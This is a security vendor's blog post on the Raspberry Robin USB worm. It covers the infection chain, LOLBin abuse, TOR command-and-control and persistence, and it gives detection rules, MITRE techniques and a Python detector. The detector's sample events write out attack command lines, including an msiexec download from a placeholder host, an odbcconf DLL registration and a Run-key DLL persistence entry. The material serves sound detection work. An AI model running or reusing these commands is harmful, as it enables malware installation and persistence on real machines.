Earlier this year, Red Canary Intelligence published a blog post about a worm, named Raspberry Robin, that spreads over removable external drives and uses compromised QNAP devices as command-and-control (C2) servers. Researchers have also dubbed the adversary LNK Worm or QNAP Worm, and its first observed occurrence dates back to September 2021. Raspberry Robin does not appear to exploit any vulnerability at this point, and it is unknown how the external drives themselves become infected to propagate its activity.
Raspberry Robin has been observed on networks globally, particularly in Europe, belonging to customers in the technology and manufacturing sectors. The compromised QNAP servers that act as the adversary's primary C2 infrastructure are distributed worldwide, with Venezuela and Germany especially prominent.
Although Raspberry Robin has not been attributed to any specific threat actor or group, since the complete actions on objective are still unknown, recent Microsoft research revealed that FakeUpdates malware is being distributed through existing Raspberry Robin infections, which in turn deploy payloads resembling Evil Corp activity. This suggests a plausible connection between the worm and the Russian cybercrime group as it remodels itself within the RaaS ecosystem.
Initial infection is usually observed through infected removable drives containing .lnk file(s) camouflaged as legitimate shortcut icons for network shares, USB devices or external media. When the infected drive is connected, cmd.exe is instantiated, which reads and executes from another malicious file stored on the removable drive, followed by an instance of explorer.exe with ambiguous command-line parameters.
After the initial infection, an instance of msiexec.exe is created to download an MSI payload from a compromised QNAP server, which performs several checks to verify the client through the connection URL and parameters.
Below are the msiexec executions observed in some of the samples:
As the installation proceeds, the msiexec.exe command listed above creates another msiexec.exe process with the command-line parameter /V, which connects to a secondary compromised QNAP server on the same port 8080 and loads a notably obfuscated, malicious DLL stored in C:\Windows\Installer\. A copy of this DLL also exists in C:\Users\<user>\AppData\Local\Temp, which the adversary uses to achieve persistence in later stages.
During the overall execution process, various living-off-the-land binaries (LOLBins) are used:
rundll32.exe starts odbcconf.exe and passes additional commands to execute and configure the recently installed malicious DLL.
odbcconf.exe has a built-in regsvr flag similar to regsvr32.exe.
An outbound C2 channel is established through regsvr32.exe, rundll32.exe, and dllhost.exe executing without command-line parameters, generating external network connections to IP addresses associated with TOR nodes.
To persist on the victim machine, Raspberry Robin installs itself into the Run key of the user's registry hive, loading the DLL from the temporary directory to replicate the same infection chain and C2 communication described above.
After analyzing samples from various sources and referring to published research, the following existing NetWitness detections help identify not just Raspberry Robin's malicious activity, but also other adversaries that employ similar techniques.
App Rules (Endpoint):
boc = 'runs chained command shell'
boc = 'runs msiexec with http argument'
boc = 'unexpected explorer.exe parent'
boc = 'runs rundll32 with http argument'
boc = 'potential abuse of odbcconf'
In addition to the existing content, we have also created new rules to better detect host and network activity related to Raspberry Robin. All of the following are currently available from NetWitness Live:
Raspberry Robin C2 Communication (Packet)
cmd.exe Reads and Executes From File (Endpoint)
Outbound Network Connections From DLL Utility Without Arguments (Endpoint)
Unexpected fodhelper.exe Parent (Endpoint)
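As an added illustration, not code from this post or from NetWitness, the following Python checker applies the behaviours described above (msiexec/rundll32 with an HTTP argument, an unexpected explorer.exe parent, odbcconf regsvr abuse, cmd.exe reading from a file, DLL utilities making outbound connections without arguments, and a Run key pointing at a DLL in the temp directory) to constructed Sysmon-style events. The event shape, the baseline of expected explorer.exe parents, and every host, path and file name are assumptions.

```python
import re
DLL_UTILITIES = {"regsvr32.exe", "rundll32.exe", "dllhost.exe"}
EXPECTED_EXPLORER_PARENTS = {"userinit.exe", "winlogon.exe", "explorer.exe"}  # assumed baseline

def normalize(cmdline):
    """Fold the mixed casing and irregular spacing used in the worm's command lines into one form."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()

def exe_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(ev):
    """Return the names of the detections that one Sysmon-style event dict matches."""
    hits, image, parent = [], exe_name(ev.get("image", "")), exe_name(ev.get("parent", ""))
    cmd = normalize(ev.get("cmdline", ""))
    args = cmd.split(" ", 1)[1] if " " in cmd else ""   # everything after the executable
    if ev["event"] == "process":
        if image in {"msiexec.exe", "rundll32.exe"} and re.search(r"https?:", args):
            hits.append(f"runs {image[:-4]} with http argument")
        if image == "explorer.exe" and parent not in EXPECTED_EXPLORER_PARENTS:
            hits.append("unexpected explorer.exe parent")
        if image == "odbcconf.exe" and "regsvr" in args:
            hits.append("potential abuse of odbcconf")
        if image == "cmd.exe" and re.search(r"(^|\s)<\s*\S", args):   # stdin redirected from a file
            hits.append("cmd.exe reads and executes from file")
    elif ev["event"] == "network" and image in DLL_UTILITIES and not args:
        hits.append("outbound network connections from dll utility without arguments")
    elif ev["event"] == "registry":
        key, val = ev.get("key", "").lower(), ev.get("value", "").lower()
        if "\\currentversion\\run" in key and "\\appdata\\local\\temp\\" in val and ".dll" in val:
            hits.append("run key loads dll from temp directory")
    return hits

def ev(kind, image, parent, cmdline, **extra):
    return {"event": kind, "image": image, "parent": parent, "cmdline": cmdline, **extra}

SAMPLE_EVENTS = [  # constructed events; hosts, paths and file names are placeholders, not indicators
    ev("process", r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe", r"CmD   /R   <   E:\ReCoVeRy.lnk"),
    ev("process", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", r"ExPlOrEr   E:\Recovery"),
    ev("process", r"C:\Windows\System32\msiexec.exe", r"C:\Windows\explorer.exe", r"MsIeXeC  /Q  /I  HTTP://host.invalid:8080/pkg.msi"),
    ev("process", r"C:\Windows\System32\odbcconf.exe", r"C:\Windows\System32\rundll32.exe", r"odbcconf /a {REGSVR C:\Windows\Installer\payload.dll}"),
    ev("network", r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\System32\svchost.exe", "regsvr32.exe", dst="203.0.113.7:443"),
    ev("registry", "", "", "", key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", value=r"rundll32 C:\Users\alice\AppData\Local\Temp\payload.dll,Start"),
    ev("process", r"C:\Windows\System32\msiexec.exe", r"C:\Windows\explorer.exe", r"msiexec /i C:\Users\alice\Downloads\app.msi"),  # benign install
]

def scan(events=SAMPLE_EVENTS):
    """Map each event index to its detections, dropping events that match nothing."""
    return {i: h for i, e in enumerate(events) if (h := detect(e))}
```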
MITRE ATT&CK Techniques
T1091 - Replication Through Removable Media
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
T1218.007 - System Binary Proxy Execution: Msiexec
T1218.011 - System Binary Proxy Execution: Rundll32
T1218.008 - System Binary Proxy Execution: Odbcconf
T1218.010 - System Binary Proxy Execution: Regsvr32
T1071.001 - Application Layer Protocol: Web Protocols
T1204.002 - User Execution: Malicious File
T1584.004 - Compromise Infrastructure: Server
T1548.002 - Bypass User Account Control
Raspberry Robin operates in a highly infectious and evasive fashion, using LOLBins, mixed upper- and lower-case letters with irregular spacing in command-line parameters, heavy obfuscation, TOR-based C2, process injection and abuse of compromised QNAP devices. This threat remains a mystery in several ways, with its broader targets yet to be unraveled.
The resources mentioned in this blog post will help you effectively monitor, detect and respond to this activity using the NetWitness Platform.